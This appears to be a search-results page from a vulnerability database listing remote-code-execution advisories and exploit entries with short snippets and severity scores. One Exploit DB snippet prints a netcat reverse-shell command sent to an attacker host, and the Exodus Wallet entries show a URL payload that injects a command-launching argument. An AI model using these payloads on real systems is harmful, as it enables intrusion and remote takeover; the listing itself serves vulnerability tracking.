
143 matches found

Hacker One
added 2018/08/30 4:37 p.m. | 22 views

Automattic: Authenticated Code Execution through Phar deserialization in CSV Importer as Shop manager in WooCommerce

This vulnerability is based on the following exploitation technique: https://blog.ripstech.com/2018/new-php-exploitation-technique/ It is easier to explain this vulnerability by having watched the PoC first: https://www.youtube.com/watch?v=mr3bAOIUwd4 Here is what's happening: 1. Since a valid ph...

8 AI score
Exploits: 0
CVE
added 2018/08/06 8:0 p.m. | 54 views

CVE-2016-4398

HP Network Node Manager i (NNMi) Software versions 10.00, 10.01 (patch1), 10.01 (patch 2), and 10.10 are affected by a remote arbitrary code execution vulnerability due to Java deserialization. The CVE-2016-4398 weakness enables an attacker to potentially run arbitrary code on a vulnerable host v...

8.8 CVSS | 8.9 AI score | 0.15347 EPSS
Exploits: 0 | References: 2 | Affected Software: 1
CVE
added 2018/06/26 4:0 p.m. | 39 views

CVE-2018-1000525

OpenPSA is affected by a PHP Object Injection vulnerability in form data passed as GET variables, allowing a crafted GET request to serialize a PHP object and potentially disclose information or achieve remote code execution. The issue arises from unsafe deserialization, enabling arbitrary code e...

9.8 CVSS | 9.7 AI score | 0.03998 EPSS
Exploits: 1 | References: 2 | Affected Software: 1
IBM Security Bulletins
added 2018/06/18 12:33 a.m. | 35 views

Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified

Summary There are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.5.1.0 to 1.5.2.5 of IBM Storwize V7000 Unified Vulnerability Details IBM Storwize V7000 Unified is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla...

9.8 CVSS | 2.1 AI score | 0.58393 EPSS
Exploits: 16 | Affected Software: 1
Tenable Nessus
added 2018/04/13 12:0 a.m. | 134 views

Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)

Binary data drupalCVE-2018-7600rce.nbin...

9.8 CVSS | 10 AI score | 0.94489 EPSS
Exploits: 45 | References: 3
CVE
added 2018/04/03 6:0 a.m. | 87 views

CVE-2018-4088

The CVE-2018-4088 entry maps to memory-corruption flaws in WebKit that could allow remote code execution via crafted web content in Apple platforms. Affected products include iOS before 11.2.5, macOS before 10.13.3, Safari before 11.0.3, iCloud/iTunes on Windows, tvOS before 11.2.5, and watchOS b...

8.8 CVSS | 7.6 AI score | 0.00374 EPSS
Exploits: 1 | References: 12 | Affected Software: 5
Microsoft KB
added 2018/02/27 12:0 a.m. | 54 views

MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014

MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014 INTRODUCTION The update that this article describes has been replaced by a newer update on December 9, 2014. We recommend that you install the most current security update for Windows. To install the most...

10 CVSS | 6.9 AI score | 0.9348 EPSS
Exploits: 1
Packet Storm
added 2018/01/26 12:0 a.m. | 38 views

Exodus Wallet (ElectronJS Framework) Remote Code Execution

window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...

8.6 AI score | 0.92322 EPSS
Exploits: 31
exploitpack
added 2018/01/25 12:0 a.m. | 14 views

Exodus Wallet (ElectronJS Framework) - Remote Code Execution

Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...

0.3 AI score
Exploits: 0
Zero Day Initiative
added 2018/01/05 12:0 a.m. | 20 views

Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2780 IOCTL in the webvrpcs process. The issue results...

6.8 CVSS | 8 AI score | 0.00686 EPSS
Exploits: 0 | References: 1
Prion
added 2017/12/25 9:29 p.m. | 17 views

Out-of-bounds

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (out-of-bounds read) via a crafted app...

9.3 CVSS | 7.1 AI score | 0.01266 EPSS
Exploits: 2 | References: 4 | Affected Software: 1
NVD
added 2017/11/16 11:29 p.m. | 10 views

CVE-2017-0834

A remote code execution vulnerability in the Android media framework libmpeg2. Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63125953...

9.3 CVSS | 7.7 AI score | 0.00212 EPSS
Exploits: 0 | References: 2
RubySec
added 2017/10/24 12:0 a.m. | 17 views

Unauthenticated Remote Code Execution Vulnerability

Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."...

7.5 CVSS | 7.3 AI score | 0.00536 EPSS
Exploits: 0 | References: 1 | Affected Software: 1
Exploit DB
added 2017/09/27 12:0 a.m. | 42 views

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

7.4 AI score
Exploits: 0
Vulnerability Lab
added 2017/09/18 12:0 a.m. | 37 views

OWASPZAP v2.5.0 - Remote Code Execution Vulnerability

Document Title: =============== OWASPZAP v2.5.0 - Remote Code Execution Vulnerability References: =========== https://www.vulnerability-lab.com/getcontent.php?id=2096 Video: https://www.youtube.com/watch?v=41gr2XhSOw Release Date: ============= 2017-09-18 Vulnerability Laboratory ID VL-ID:...

7.1 AI score
Exploits: 0
CVE
added 2017/08/04 7:0 p.m. | 126 views

CVE-2017-12481

CVE-2017-12481 affects Ledger 3.1.1, where the find_option function in option.cc can be triggered by a crafted file to cause a stack-based buffer overflow, leading to a denial of service (and potentially other impact). Public documents in the connected set confirm this CVE alongside related ones ...

7.8 CVSS | 8 AI score | 0.00295 EPSS
Exploits: 0 | References: 4 | Affected Software: 1
Exploit DB
added 2017/06/30 12:0 a.m. | 34 views

BestSafe Browser - Man In The Middle Remote Code Execution

Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution Date: 30/Jun/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com Software Link: See APK archive websites Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As...

7.4 AI score
Exploits: 0
OpenVAS
added 2017/06/16 12:0 a.m. | 21 views

openSUSE: Security Advisory for mercurial (openSUSE-SU-2017:1572-1)

The remote host is missing an update for the Copyright (C) 2017 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

9 CVSS | 8.8 AI score | 0.48699 EPSS
Exploits: 1 | References: 1
NVD
added 2017/04/28 7:59 p.m. | 14 views

CVE-2016-8586

detectedpotentialfiles.cgi in Trend Micro Threat Discovery Appliance 2.6.1062r1 and earlier allows remote authenticated users to execute arbitrary code as the root user via shell metacharacters in the cacheid parameter...

9 CVSS | 8.7 AI score | 0.03311 EPSS
Exploits: 5 | References: 2
Metasploit
added 2017/04/18 8:33 p.m. | 48 views

Mercurial Custom hg-ssh Wrapper Remote Code Exec

This module takes advantage of custom hg-ssh wrapper implementations that don't adequately validate parameters passed to the hg binary, allowing users to trigger a Python Debugger session, which allows arbitrary Python code execution. This module requires Metasploit: https://metasploit.com/downlo...

8.8 CVSS | 0.2 AI score | 0.48699 EPSS
Exploits: 1